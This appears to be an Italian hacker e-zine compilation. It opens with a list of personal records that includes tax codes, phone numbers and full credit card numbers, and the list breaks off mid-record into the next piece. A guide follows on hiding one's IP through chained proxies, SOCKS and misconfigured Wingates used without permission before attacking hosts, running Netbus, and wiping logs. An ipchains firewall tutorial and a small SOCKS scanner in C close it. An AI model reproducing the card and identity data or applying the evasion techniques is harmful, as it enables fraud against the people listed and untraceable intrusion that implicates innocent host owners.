Robustelli NATO IL 15 / 12 / 1952 A Turbigo (MI) RESIDENTE IN Via Palermo 9 55043 Lido di Camaiore (LU) COD. FISCALE N. RBS LSS 52T15 L471C CELLULARE N. (Tim EuroBasic) 0335-2338266 CARTA DI CREDITO 4095 2791 5001 5954 (Banca : CARIPLO) E-MAIL: arobustelli@... NOME Alex COGNOME Balducci NATO IL 26 / 10 / 1962 A Gravellona Toce (NO) RESIDENTE IN Via MonteRosa 15 00152 Roma (ROMA) COD. FISCALE N. BLD LXA 62R26 E153I CELLULARE N. (Tim EuroFamily) 0338-8214080 CARTA DI CREDITO 4095 7009 5907 8497 (Banca : CARIPLO) E-MAIL: abalducci@... NOME Vittorio COGNOME Brambilla NATO IL 9 / 6 / 1977 A Bussolengo (VR) RESIDENTE IN Via Cavour 6 42030 Marola (RE) COD. FISCALE N. BRM VTR 77H09 B296X CELLULARE N. (Tim EuroFamily) 0338-4466908 CARTA DI CREDITO 4095 6149 2925 1383 (Banca : CARIPLO) E-MAIL: vbrambilla@... NOME Gianni COGNOME Beretta NATO IL 7 / 12 / 1954 A Bologna (BO) RESIDENTE IN Piazza del Popolo 24 94010 Pergusa (EN) COD. FISCALE N. BRT GNN 54T07 A944W CELLULARE N. (Tim EuroTime) 0338-1096466 CARTA DI CREDITO 4095 8643 9551 6476 (Banca : CARIPLO) E-MAIL: gberetta@... NOME Emanuele COGNOME Perego NATO IL 9 / 12 / 1964 A Bolzano (BZ) RESIDENTE IN Largo C. Menotti 19 55043 Lido di Camaiore (LU) COD. FISCALE N. PRG MNL 64T09 A952H CELLULARE N. (Tim EuroProf.) 0335-2877290 CARTA DI CREDITO 4095 0129 6608 5030 (Banca : CARIPLO) E-MAIL: eperego@... NOME Francesco COGNOME Crippa NATO IL 17 / 4 / 1950 A Varese (VA) RESIDENTE IN Piazza del Popolo 21 55043 Lido di Camaiore (LU) COD. FISCALE N. CRP FNC 50D17 L682Z CELLULARE N. (Tim EuroProf.) 0335-7766738 CARTA DI CREDITO 4095 3540 8807 5071 (Banca : CARIPLO) E-MAIL: fcrippa@... NOME Martino COGNOME Pasqualin NATO IL 6 / 5 / 1978 A Firenze (FI) RESIDENTE IN Viale Milano 28 74100 Taranto (TA) COD. FISCALE N. PSQ MTN 78E06 D612J CELLULARE N. (Tim EuroTime) 0338-4969434 CARTA DI CREDITO 4095 6260 9662 6999 (Banca : CARIPLO) E-MAIL: mpasqualin@... NOME Franco COGNOME Mastrandrea NATO IL 2 / 4 / 1974 A Bussolengo (VR) RESIDENTE IN Via Petrarca 25 90018 Termini Imerese (PA) COD. FISCALE N. MST FNC 74D02 B296K CELLULARE N. (Tim EuroBasic) 0335-5884229 CARTA DI CREDITO 4095 2873 4601 4047 (Banca : CARIPLO) E-MAIL: fmastrandrea@... NOME Giovanni COGNOME Scotti NATO IL 28 / 8 / 1968 A Porto Recanati (MC) RESIDENTE IN Piazza della Repubblica 25 14036 Moncalvo (AT) COD. FISCALE N. SCT GNN 68M28 G919W CELLULARE N. (Omnitel Libero) 0347-2911167 CARTA DI CREDITO 4095 5486 7474 0267 (Banca : CARIPLO) E-MAIL: gscotti@... NOME Luigi COGNOME Caputo NATO IL 5 / 11 / 1951 A Cavallino (VE) RESIDENTE IN Viale Liberazione 1 20029 Turbigo (MI) COD. FISCALE N. CPT LGU 51S05 C377W CELLULARE N. (Omnitel Libero) 0347-4615041 CARTA DI CREDITO 4095 5649 7814 7422 (Banca : CARIPLO) E-MAIL: lcaputo@... NOME Gianpaolo COGNOME Martini NATO IL 25 / 7 / 1965 A Gravellona Toce (NO) RESIDENTE IN Via Alfieri 9 60022 CastelFidardo (AN) COD. FISCALE N. MRT GPL 65L25 E153U CELLULARE N. (Tim EuroBasic) 0335-2150700 CARTA DI CREDITO 4095 5496 7462 1432 (Banca : CARIPLO) E-MAIL: gmartini@... NOME Emanuele COGNOME Grisetti NATO IL 12 / 8 / 1971 A Villanovafranca (CG) RESIDENTE IN Vicolo Croce 9 90018 Termini Imerese (PA) COD. FISCALE N. GRS MNL 71M12 L987E CELLULARE N. (Omnitel Libero) 0347-3864265 CARTA DI CREDITO 4095 9954 3804 7812 (Banca : CARIPLO) E-MAIL: egrisetti@... NOME Giulio COGNOME Brambilla NATO IL 10 / 10 / 1949 A Conselve (PD) RESIDENTE IN Via Roma 11 50020 Romola (FI) COD. FISCALE N. BRM GLI 49R10 C964P CELLULARE N. (Tim EuroBasic) 0335-4530817 CARTA DI CREDITO 4095 3094 3583 1634 (Banca : CARIPLO) E-MAIL: gbrambilla@... NOME Alex COGNOME Martini NATO IL 27 / 1 / 1945 A Villanovafranca (CG) RESIDENTE IN Via Petrarca 28 20029 Turbigo (MI) COD. FISCALE N. MRT LXA 45A27 L987U CELLULARE N. (Tim EuroFamily) 0338-9876733 CARTA DI CREDITO 4095 4099 0734 8313 (Banca : CARIPLO) E-MAIL: amartini@... NOME Massimo COGNOME Rigoli NATO IL 20 / 12 / 1977 A Pragelato (TO) RESIDENTE IN Via Ragazzi del 99 7 06024 Gubbio (PG) COD. FISCALE N. RGL MSM 77T20 G973G CELLULARE N. (Tim EuroTime) 0338-6418805 CARTA DI CREDITO 4095 3913 8758 4668 (Banca : CARIPLO) E-MAIL: mrigoli@... NOME Francesco COGNOME Arrigoni NATO IL 22 / 5 / 1955 A Lido di Camaiore (LU) RESIDENTE IN Largo Garibaldi 25 54037 Marina di Massa (MC) COD. FISCALE N. RRG FNC 55E22 B455Z CELLULARE N. (Tim EuroTime) 0338-3269732 CARTA DI CREDITO 4095 9731 2835 6173 (Banca : CARIPLO) E-MAIL: farrigoni@... NOME Matteo COGNOME Chilin NATO IL 27 / 10 / 1944 A Cavizzana (TN) RESIDENTE IN Piazza Indipendenza 28 37012 Bussolengo (VR) COD. FISCALE N. CHL MTT 44R27 C400J CELLULARE N. (Tim EuroFamily) 0338-3238370 CARTA DI CREDITO 4095 9962 3277 3561 (Banca : CARIPLO) E-MAIL: mchilin@... NOME Pasquale COGNOME Francisci NATO IL 9 / 9 / 1977 A Turbigo (MI) RESIDENTE IN Via Alfieri 28 06024 Gubbio (PG) COD. FISCALE N. FRN PQL 77P09 L471B CELLULARE N. (Omnitel Libero) 0347-9234489 CARTA DI CREDITO 4095 3731 3438 0699 (Banca : CARIPLO) E-MAIL: pfrancisci@... NOME Silvano COGNOME Ferrazzi NATO IL 11 / 7 / 1968 A Porto Recanati (MC) RESIDENTE IN Via Palermo 6 22030 Lasnigo (CO) COD. FISCALE N. FRR SVN 68L11 G919A CELLULARE N. (Tim EuroTime) 0338-3385695 CARTA DI CREDITO 4095 3146 8614 2038 (Banca : CARIPLO) E-MAIL: sferrazzi@... NOME Stefano COGNOME Rigamonti NATO IL 27 / 12 / 1948 A Porto Recanati (MC) RESIDENTE IN Via Alfieri 30 56030 Selvatelle (PI) COD. FISCALE N. RGM SFN 48T27 G919T CELLULARE N. (Tim EuroProf.) 0335-3831646 CARTA DI CREDITO 4095 1351 4903 8293 (Banca : CARIPLO) E-MAIL: srigamonti@... NOME Andrea COGNOME Ferro NATO IL 2 / 5 / 1949 A Pragelato (TO) RESIDENTE IN Piazza XXII Maggio 7 06024 Gubbio (PG) COD. FISCALE N. FRR NDR 49E02 G973S CELLULARE N. (Tim EuroBasic) 0335-1164522 CARTA DI CREDITO 4095 5097 0999 1911 (Banca : CARIPLO) E-MAIL: aferro@... NOME Alessandro COGNOME Brusoli NATO IL 23 / 6 / 1942 A Alghero (SS) RESIDENTE IN Via Isonzo 5 60022 CastelFidardo (AN) COD. FISCALE N. BRS LSN 42H23 A192M CELLULARE N. (Tim EuroBasic) 0335-6473458 CARTA DI CREDITO 4095 5952 2036 6360 (Banca : CARIPLO) E-MAIL: abrusoli@... NOME Oscar COGNOME Fanton NATO IL 4 / 2 / 1950 A Bologna (BO) RESIDENTE IN Vicolo Mazzini 3 50014 Fiesole (FI) COD. FISCALE N. FNT SCR 50B04 A944G CELLULARE N. (Tim EuroTime) 033NOME Giacomo 0x00.3 Proxy ------------ Uno dei problemi principali del newbie e del wannabe e' come nascondere o cambiare il proprio ip durante la navigazione o per entrare in IRC. I browser (Explorer, Netscape) prevedono l'uso di "proxy", ovvero computer che si frappongono tra noi e il resto della rete; quando cerchiamo di recuperare una pagina sul web, il nostro browser contattera' il proxy, e sara' quindi quest'ultimo a "prelevare" il documento html e a inviarlo a noi; vantaggio di questa operazione e' che l'ip loggato dal server di destinazione (dove abbiamo prelevato la pagina) sara' quello del proxy e non il nostro. Attenzione pero': non tutti i proxy sono anonimi. Questo significa che in alcuni casi il proxy lascia "filtrare" il nostro ip reale che restera' nei log del server. Prima di usare un proxy, ci si doverebbe sempre assicurare che si tratta di un proxy anonimo che non rivela il nostro ip. Questo testo puo' essere effettuato collegandosi a http://www.anonymizer.com/snoop.cgi, una pagina che fa un test sul grado di anonimato del nostro sistema. Comunque anche utilizzando un proxy anonimo non vi dovete sentire sicuri, anzi. Sarebbe opportuno concatenare due o piu' proxy prima di collegarsi al vero obbiettivo. Come ? Innanzitutto questa tecnica funziona solo con alcuni tipi di proxy, i Delegate; quando avete trovato alcuni Delegate, dovete mettere nella barra del browser la seguente stringa: http://proxy1.url:port/-_-http://proxy2.url:port/-_- dove proxy1,proxy2 e proxy3 sono gli indirizzi dei proxy Delegate che avete trovato. Ricordate: piu' proxy mettete, piu' diminuiscono le probabilita' di essere rintracciati, ma aumenta anche il tempo di latenza, rallentando la navigazione. Ma anche i proxy loggano... Io vi consiglio di concatenare quanti + possibili proxi, in rete trovate una lista completa di migliaia di server, esempio (porta 8088): proxy.sce.com proxy.speedware.com proxye1-atm.elp.rr.com proxye1-atm.maine.rr.com proxye2-atm.elp.rr.com 209.20.42.6 210.131.240.3 210.140.48.2 210.145.39.211 210.160.178.46 210.161.225.164 210.163.132.10 210.170.69.146 proxy3.emirates.net.ae proxyf.emirates.net.ae proxye3-atm.elp.rr.com proxye3-atm.maine.rr.com proxye4-atm.elp.rr.com proxye4-atm.maine.rr.com proxye2-atm.nycap.rr.com proxye2-atm.san.rr.com proxye3-atm.nycap.rr.com proxye3-atm.san.rr.com proxye4-atm.nycap.rr.com proxye4-atm.san.rr.com proxyi.emirates.net.ae proxyj.emirates.net.ae proxyk.emirates.net.ae proxy4.emirates.net.ae cache02.netway.at www-proxy.tecan.co.at basil.acr.net.au proxy.gwbbs.net.au proxy.newave.net.au cvs2.kyunghee.ac.kr www.pt.lu proxyone.cowles.com relay1.kemmunet.net.mt proxy.vt.com tenaga.tnb.com.my proxy2.lsil.com cache-1.golden.net titan.datainternet.com cache2.bora.net be3334.schering.de proxy.golden.net bibo.fz.uni-lueneburg.de E dopo la lista eccovi un bel URL che vi interesserà sicuramente : http://tools.rosinstrument.com/proxy/ 0x00.4 Socks ------------ Nelle reti protette da firewall gli host interni entrano in Internet attraverso un servizio speciale: Socks. Questo protocollo la cui porta di default e' la 1080, permette alle applicazioni che lo supportano di collegarsi a Internet in modo indiretto, con il firewall che fa da tramite. Il principio e' lo stesso del proxy per http, ma il range di applicazioni e' piu' vasto. In pratica ogni applicazione che supporta Socks, puo' collegarsi a Internet tramite Socks. Il vantaggio e' come al solito che l'ip che appare non e' piu' il nostro ip reale, ma quello del firewall; inoltre nuke & DoS vari del lamer di turno saranno diretti al firewall, lasciando del tutto indifferente la nostra macchina! L'utilizzo dei Socks e' classico nel mondo di IRC, ma puo' essere utilizzato anche con altre applicazioni; Volete proprio usare il Netbus? Ok, ma almeno non fatevi beccare subito con il vostro ip vero... usate un Socks. Volete fare del port-surfing manuale con il Telnet? Usate Socks... Certo, non tutti i programmi prevedono l'uso di Socks (per esempio, il Telnet di serie di Windows non lo supporta), ma grazie a un programma tipo SocksCap si puo' fare in modo che TUTTI i programmi di rete (compreso il Telnet standard di Windows) possano collegarsi in modo "anonimo". In questo modo e' possibile anche inviare email tramite Outlook o Eudora senza la paura di esporre il nostro ip reale, ma quello per esempio di un computer del governo di Taiwan... 0x00.5 Wingate -------------- Wingate e' un porgramma per Windows che permette di collgare piu' macchine tramite una sola connesisone Internet, tramite le funzioni di proxy http, Socks, proxy ftp, telnet... In Internet si trovano molti Wingate mal configurati che permettono l'accesso anche a utenti non autorizzati (noi!). Il meccanismo e' quello visto il precedenza per i proxy e i Socks (ovvero l'ip che viene lasciato in giro e'quello del Wingate e non il nostro), ma ha una modalita' di utilizzo diversa. Lanciate il Telnet e collegatevi alla porta 23 del Wingate, se tutto e' Ok avrete un prompt del genere: Wingate> a questo punto mettete l'indirizzo dell'host al quale vi volete collegare, segutio dal numero di porta: Wingate>bill.whitehouse.gov 23 (Naturalmente sto scherzando: lasciate stare i .gov...) a questo punto il vostro ip e' al sicuro (relativamente, come sempre). Anche nel caso dei Wingate e' buona norma concatenare piu' Wingate tra di loro, cosi: quando avete il prompt del Wingate (Wingate>) inserite l'indirizzo di un altro Wingate,e poi un altro... infine l'indirizzo dell'host da attaccare. Certo aumenta il lag, ma e' sempre meglio che andare in galera... 0x00.6 Trovare Proxy, Socks & Wingate ------------------------------------- Altro problema annoso del novello "hacker": dove li trovo i proxy & i Wingate ? Esistono diversi modi per procurarsi questi indirizzi. Il piu' immediato (e il meno redditizio) e' quello di andare su uno di quei siti che pubblicano liste di proxy e socks (proxy4all.cgi.net, la sezione apposita in www.cyberarmy.com e altri...). Il problema e' che questi proxy durano pochissimo o non funzionano affatto... Conviene arrangiarsi in altro modo. Procuriamoci uno scanner e lanciamolo in giro x la rete, prima o poi qualcosa troviamo. Per informazione, le porte su cui trovare qualcosa sono le seguenti: 8080 proxy http 3128 proxy http 81 proxy http 1080 Socks Un altro modo efficace x trovare Socks e' quello di entrare in IRC e dare il comando /stats k per avere la lista dei k-line, ovvero la lista di host "bannati". Molti host della lista saranno Socks bannati da quel server ma perfettamente funzionanti x altri scopi! Siete pigri e non avete voglia di cercare? Aspettate che i Socks vengano a voi! Lanciate il Nukenabber e navigate tranquillamente (oppure andate su un canale molto frequentato in IRC); Alla fine della serata date uno sguardo al log del Nukenabber: tra i vari tentativi di lamer con BO & Netbus, forse ci sara' anche qualche indirizzo di Socks utilizzabile... Altre tecniche potete trovarle nel mio articolo "Gabole nella Rete", reperibile sul mio sito e sul numero 0 di "Lightz". 0x00.7 Pericoli --------------- Per iniziare bisogna dire che NESSUNA tecnica qui esposta garantisce l'anonimato assoluto, esiste sempre un margine di pericolo. Dal momento della connessione dial-up con il provider alla connessione tramite TCP/IP in Internet, lasciamo un mare di tracce ovunque. La compagnia telefonica ha sempre e comunque il nostro vero numero, anche se usiamo il BIC. I vari proxy che usiamo molto probabilmente (anzi, sicuramente) loggano tutto il traffico, cosi'come i Socks: forse c'e' qualche speranza con i Wingate. Assolutamente da evitare gli host "boservizzati" o cmq "trojanizzati". Forse il metodo piu' sicuro e' quello di essere root su di un sistema e avere la la possibilita' di "ripulire" per bene i log. Da non dimenticare poi la possibilita' di mettere nei guai gli ignari possessori di host compromessi (ancora una volta: trojan e backdoor varie) o i responsabili dei sistemi che usiamo per "rimbalzare" (Wingate, proxy...). sYn -testo adattato- <---w w w . h a c k e r s a t . c o m---><---syn@hackersat.com---> ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø GUIDA PRATICA ALL'USO DI IPCHAINS ø ø kEwL ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø Guida Pratica all’Uso di ipchains By Ghost Rider Tradotto da kEwL` Introduzione Come puoi vedere nel titolo, questa è una guida pratica, così puoi mettere da parte tutti quei dubbi tecnici. Il mio obiettivo è di fornire delle informazioni alle persone normali che non sanno dove cominciare nel settare un firewall con ipchains sul loro computer o sul- la LAN. Prendi qualcosa da mangiare e un po’ di caffè e comincia a scalare la collina, ehm...teso. Cominciamo a leggere qualcosa di utile, ok? Basi necessarie Policy di Rete La prima che devi pensare è che policy vuoi usare [per policy si intende un metodo da uti- lizzare nell’installare il firewall...se continui a leggere ti sarà più chiaro]. Ci sono due tipi di policy, il policy Accetta e il policy Rifiuta. Nel policy Accetta tutto quello che non è specificato per rifiutare sarà accettato, altrimenti nel policy Rifiuta tutto sarà rifiutato, tranne quello che hai escluso. Nella mia opinione il policy migliore è il policy rifiuta, poiché devi solo aggiungere i servizi che non vuoi dare, e tutto il resto sarà rifiutato. Il policy accept potrebbe aver bisogno di alcuni rules di filtro, poiché devi specificare tutto quello che non vuoi bloc- care. Chains e Rules Se non sai per cosa stanno queste due parole, avrai problemi a capire il funzionamento di ipchains. Chains Ci sono 4 tipi di chains; focalizziamo sui primi 3 così puoi capire cos’è un chain. Quando un pacchetto sta cercando di entrare nell’interfaccia di rete, esso passerà attraverso il chain input; se il pacchetto sta cercando di uscire dall’interfaccia di rete, esso passerà attraverso il chain output; se il pacchetto sta cercando di "saltare" da un’interfaccia ad un’altra passerà attraverso il chain forward. Quello che sto cercando di dire è questo: - Quando un pacchetto cerca di accedere alla nostra rete dovrà passare attraverso il chain input; - Quando un pacchetto cerca di lasciare la nostra rete dovrà passare attraverso il chain output; - Quando un pacchetto cerca di saltare da un’interfaccia ad un’altra (se non capisci questa parte, immagina l’ip forward, è realizzato in questo chain) dovrà passare attraverso il chain forward. Il 4° chain è il chain definito dall’utente, dove puoi creare il tuo chain. In ognuno di questi chains dovrai definire che policy userai. Ci sono 3 possibili policy: Per usare il policy accetta userai il policy ACCEPT. Per usare il policy rifiuta puoi usare i seguenti policy: - DENY - REJECT Qual è la differenza tra questi due policy? Se usi il policy DENY i pacchetti che non sono permessi saranno scartati dal kernel, senza riferire all’host remoto che il pacchetto è stato scartato. Questo è buono, perché il tuo sistema non spreca risorse, e non farà vedere all’host remoto che il pacchetto è stato ri- fiutato, e questo è positivo soprattutto se c’è qualcuno che sta cercando di hackare il tuo sistema. Se usi il policy REJECT, i pacchetti che non sono permessi saranno anche scartati ma verrà generato un errore ICMP generato dal kernel e mandato all’host remoto. Questo ridurrà le risorse di sistema, che ruberanno molto tempo. Il mio consiglio è di usare il policy DENY al posto del REJECT. Ci sarà un’eccezione ma ne parleremo più tardi. Rules Abbiamo parlato dei chains, ma solo i chains non filtrano i pacchetti, i chains hanno solo i policy. I rules controllano il flusso dei pacchetti attraverso i chains. Possiamo vedere un rule come un gruppo di condizioni e un obbiettivo. Il gruppo di condizioni è usato per confrontare solo un tipo di pacchetti, l’obbiettivo definirà cosa succederà ai pacchetti che confronterà il gruppo di condizioni. Nei rules puoi anche usare ACCEPT, REJECT e DENY. Questo accetterà, respingerà (REJECT) o rifiuterà (DENY) i pacchetti che coincidono con le condizioni di quei rules, e in questo caso il policy del chain non influenzerà, poiché c’è un rule apposta per quel pacchetto. Se non c’è un rule per il pacchetto, sarà applicato ad esso il policy del chain. Il mio consiglio è di usare sempre DENY, perché non spreca le risorse del sistema come fa REJECT. Ma ricorda che se ti stai connettendo a SMTP, aggiungi un rule REJECT alla porta 113 (auth). Perché? Perché quando ti connetti al server SMTP, il server remoto cercherà di connettersi alla tua porta auth per sapere chi sei, e se metti DENY il pacchetto sarà scar- tati "silenziosamente" così il server SMTP aspetterà fino al timeout per procedere, e questo può impiegare circa 1 o 2 minuti. Così se setti il rule REJECT alla porta 113, quan- do SMTP cerca di connettersi riceve un errore e procederà senza dover aspettare. È meglio vero? L’ultima cosa che dovresti sapere sui rules è che verrà verificato il primo rule, e il pro- cesso verrà bloccato per quel pacchetto. Questo significa che se prima hai detto di blocca- re tutte le porte da 10 a 100 e nel rule dopo permetti la connessione alla porta 22, il se- condo rule non avrà effetto perché la 22 è compresa tra la 10 e la 100, e così solo il pri- mo sarà valido. Ora parleremo dell’ultima cosa in questa sezione e cominceremo con i comandi ipchains per costruirci il nostro firewall. Bello vero? E l’ultimo argomento è ...(rullo di tamburi)... Ip e Masking Perché masking [letteralmente mascherare]? Perché il masking può essere molto utile nei ru- les. Se qualcuno di voi ha detto perché masking, qualcun altro ha detto cos’è il masking? Poiché l’argomento masking potrebbe occupare un intero documento, o anche un libro, ripor- terò un brevissimo riassunto che sarà sufficiente per farti capire come funziona. Un indirizzo IP è costruito di 4 campi, ognuno separato dall’altro con un punto. Esempio: IP: 193.34.13.15 - questo IP può anche essere scritto 11000001.00100010.00001101.00001110 In un IP alcuni di questi campi rappresentano la mask di rete e il resto di esso rappresen- tano la host mask. Il masking ci dice quanti bit sono fissati, e quanti non lo sono. Questo significa che 0.0.0.0/0 può significare ogni indirizzo IP, e 134.34.12.12/32 può significare solo 134.34.12.12 ma 134.34.12.0/24 può significare gli IP da 134.34.12.0 a 134.24.12.255. Il segreto per capire ciò è pensare gli ip in forma binaria e non decimale. Bene penso che siete preparati per cominciare con ipchains. Che ne dite? Cominciamo? Ipchains: Finalmente!!! Penso che il miglior modo di parlare della sintassi di ipchains e delle configurazioni è scrivere uno script ipchains. Ci saranno due scripts, uno per lo il computer standalone (che sta da solo) e un altro per un firewall che coprirà un’intera rete. Ci saranno i com- menti così potete capire. ---- Lo script comincia quì --- #!/bin/bash # ipchains script scritto da Ghost_Rider # usato come esempio in Guida Pratica all’Uso di ipchains IPCHAINS ="/sbin/ipchains" # Per prima cosa scriveremo tutti i rules. Questo ci assicurerà che i vecchi rules che # possono essere qui non sono usati altrove. $IPCHAINS -F input $IPCHAINS -F output $IPCHAINS -F forward # Ora settiamo i policy. # Il policy Deny per input e forwarding (questo sarà un computer standalone) # Policy Access per output # Nota: il policy deve essere in maiuscolo altrimenti non funzioneràrk $IPCHAINS -P input DENY $IPCHAINS -P output ACCEPT $IPCHAINS -P forward DENY # Tutto il traffico localhost sarà accettato così aggiungiamo la seguente linea $IPCHAINS -A input -i lo -j ACCEPT # Questo significa: # -A: aggiunge un rule al chain, in questo caso il chain input # -i: dice che interfaccia filtrare, in questo caso lo (loopback), questo significa il # traffico localhost # -j: dice cosa fare con il pacchetto (policy del rule) # Permettiamo ai pacchetti con connessioni stabilite di procedere. # Quello che fa è controllare se il pacchetto ha il flag syn, perciò mettiamo ! -y che sta # per negazione di -y # Ma questa richiesta può essere falsificata. Non è difficile costruire il pacchetto. $IPCHAINS -A input -i ppp0 -p tcp ! -y -j ACCEPT # ppp0: è l’interfaccia di connessione ppp # -p: sceglie il protocollo per quel rule, in questo caso tcp # -y: controlla se i pacchetti hanno il flag syn o no. # !: nega l’opzione, in questo caso -y # Accettiamo le risposte DNS $IPCHAINS -A input -i ppp0 -p tcp -sport 53 -j ACCEPT $IPCHAINS -A input -i ppp0 -p udp -sport 53 -j ACCEPT # Permettiamo le connessioni a ssh $IPCHAINS -A input -i ppp0 -p tcp --dport 22 -j ACCEPT # --dport: dice la porta di destinazione, in questo caso la 22 # puoi anche usare --sport per la porta sorgente (porta dalla macchina remota). # Respingiamo la connessione auth # Se non sai perché stiamo facendo ciò, rileggi la sezione rule. $IPCHAINS -A input -i ppp0 -p tcp --dport 113 -j REJECT # Permettiamo alcuni tipi di ICMP. # il tipo 0 è echo reply (così puoi ricevere le risposte dei ping che mandi) # il tipo 3 è Destination Unreachable (così non devi aspettare i timeout) # il tipo 11 è Time Exceed (usato per il traceroute) $IPCHAINS -A input -i ppp0 -p icmp --dport 0 -j ACCEPT $IPCHAINS -A input -i ppp0 -p icmp --dport 3 -j ACCEPT $IPCHAINS -A input -i ppp0 -p icmp --dport 11 -j ACCEPT # NOTA: probabilmente stai pensando "perché metto le porte destinazione se icmp non ha # porte?" # Bene se osservi bene, il --dport specifica il tipo di icmp. # Sì...In ipchains il --dport quando il protocollo è icmp chiama il tipo icmp. Non # dimenticarlo. # Ora vediamo tutto quello che ci colpisce e loggiamolo. $IPCHAINS -A input -j DENY -l # Come hai letto nella sezione rule il primo che confronta vince e l’analisi degli altri # rule non verrà fatta. Così quello che facciamo qui è se il pacchetto che ci ha colpito # non è stato accettato dagli altri rules, è perché è qualcosa che vogliamo rifiutare ma è # meglio loggare e quindi usiamo l’opzione -l # Se non vuoi loggare questi pacchetti non hai bisogno di mettere questo rule, poiché il # policy di chain inuput è DENY così il pacchetto sarà scartato, ma non loggato. --- Lo script finisce quì ----- Ora vediamo uno script di un firewall che sarebbe anche per una macchina per l’ip masquera- ding. Alcuni rules non avranno commenti dettagliati come nel primo script poiché li hai già. Facendo ciò sto supponendo che il firewall ha due interfaccie, la ppp0 che lo connette ad internet e la eth0 che lo connette con la LAN. ---- Lo script comincia quì ---- # Script di ipchains scritto da Ghost Rider usato come esempio in # Guida Pratica all’Uso di Ipchains IPCHAINS = "/sbin/ipchains" # Scriviamo i rules $IPCHAINS -F input $IPCHAINS -F output $IPCHAINS -F forward # Setta la policy # input userà DENY # output e forward userà ACCEPT $IPCHAINS -P input DENY $IPCHAINS -P output ACCEPT $IPCHAINS -P forward ACCEPT # Permette il traffico locale $IPCHAINS -A input -i lo -j ACCEPT $IPCHAINS -A input -i eth0 -j ACCEPT # eth0 sta per l’interfaccia con la prima scheda ethernet # Ora blocchiamo gli indirizzi IP privati che dovrebbero entrare con ppp0 $IPCHAINS -A input -i ppp0 -s 10.0.0.0/8 -j DENY $IPCHAINS -A input -i ppp0 -s 172.16.0.0/12 -j DENY $IPCHAINS -A input -i ppp0 -s 192.168.0.0/16 -j DENY # Ora perché blocchiamo questi indirizzi ip? # Bene questi 3 indirizzi di rete sono ip ristretti che sono usati per scopi interni # Questo significa che nessun host in internet può avere quegli ip # Così è un po’ strano se vengono da ppp0, sembra come se qualcuno volesse spoofarsi # e hackare la tua rete, quindi li rifiutiamo...giustO?:) # Permettiamo le risposte DNS, ma solo i nostri server DNS primario e secondario. # nota: 194.130.20.19 e 194.13.20.20 sono i nostri server DNS $IPCHAINS -A input -i ppp0 -p tcp -s 194.13.20.19 53 -j ACCEPT $IPCHAINS -A input -i ppp0 -p tcp -s 194.13.20.20 53 -j ACCEPT $IPCHAINS -A input -i ppp0 -p udp -s 194.13.20.19 53 -j ACCEPT $IPCHAINS -A input -i ppp0 -p udp -s 194.13.20.20 53 -j ACCEPT # Permettiamo ssh. Non abbiamo bisogno di permettere il -i eth0 a -dport 22 perché # stiamo già accettando tutto da eth0 # controlla quando stiamo accettando loopback e pacchetti ethernet $IPCHAINS -A input -i ppp0 --dport 22 -j ACCEPT # Ora respingeremo i pacchetti per la porta 113 $IPCHAINS -A input -i ppp0 -p tcp --dport 113 -j REJECT # permette quei 3 tipi di ICMP $IPCHAINS -A input -i ppp0 -p icmp --dport 0 -j ACCEPT $IPCHAINS -A input -i ppp0 -p icmp --dport 3 -j ACCEPT $IPCHAINS -A input -i ppp0 -p icmp --dport 11 -j ACCEPT # Logga tutto il resto $IPCHAINS -A input -j DENY -l # Ora blocchiamo alcuni indirizzi che non vogliamo far accedere alla nostra LAN # come www.porno.com e www.compagnia.rivale.com # supponiamo che gli indirizzi ip siano 202.120.12.3 e 120.10.0.34 $IPCHAINS -A output -i eth0 -d 202.120.12.3 -j DENY $IPCHAINS -A output -i ppp0 -d 120.10.0.34 -j DENY # E infine aggiungeremo il rule per il masq $IPCHAINS -A forward -j MASQ -s 192.68.1.0/24 -d ! 192.168.1.0/24 # La nostra rete è 192.68.1.0/24 # -d ! 192.168.1.0/24 è messo perché la destinazione non sia la nostra rete # In altre parole...se la sorgente è la nostra rete e la destinazione non lo è # il firewall deve usare MASQ. # Ora ricorda che solo con questo rule ipchains non puoi forwardare le cose... # Perché il firewall non "routa" le cose...è per le tavole di routing. # Così installa lo strumento port forwarding (ipmasadm). ---- Lo script termina qui ---- Una piccola informazioni sullo strumento port forwarding: Diciamo che l’indirizzo del tuo file esterno è 193.45.12.10 e che l’host che sta dando i servizi http è 192.168.1.17. Puoi scrivere qualcosa del genere: ipmasqadm portfw -a -P tcp -L 193.45.12.10 80 -R 192.168.1.17 80 dove: portfw può definirsi il chain forwarding per ipmasqadm -a sta per aggiungi (come ipchains) -P sta ad indicare il protocollo, in questo caso tcp -L sta per l’indirizzo locale, con ip e porta -R sta per l’indirizzo da inoltrare, con ip e porta Bene penso che è tutto per ora Spero che ti ho aiutato a capire come usare ipchains e come settarlo. Buona giornata. ø-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-¡-!-ø ø SOCKS SCANNER ø ø ø ø¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥~¥ø /* socks scan, its 2 lame */ #include #include #include #include #include #include #include #include unsigned int port=1080; struct sockaddr_in addr, spoofedaddr; struct hostent *host; int err,s; FILE *fp; int open_sock(int sock, char *server, int port) { struct sockaddr_in blah; struct hostent *he; bzero((char *)&blah,sizeof(blah)); blah.sin_family=AF_INET; blah.sin_addr.s_addr=inet_addr(server); blah.sin_port=htons(port); if ((he = gethostbyname(server)) != NULL) { bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length); } else if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) return(-3); if (connect(sock,(struct sockaddr *)&blah,16)==-1) { close(sock); return(-4); } return(1); } void main(int argc, char *argv[]) { if (argc < 2) { printf("use: %s IP\n",argv[0]); exit(0); } if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket()"); exit(-1); } if (argv[2]) port=atoi(argv[2]); err=open_sock(s,argv[1],port); if (err<0) printf("\nits not look like a socks\n"); else { printf("\nu got it buster\n"); fp=fopen("socks","a"); fprintf(fp,"\n%s",argv[1]); fclose(fp); } } 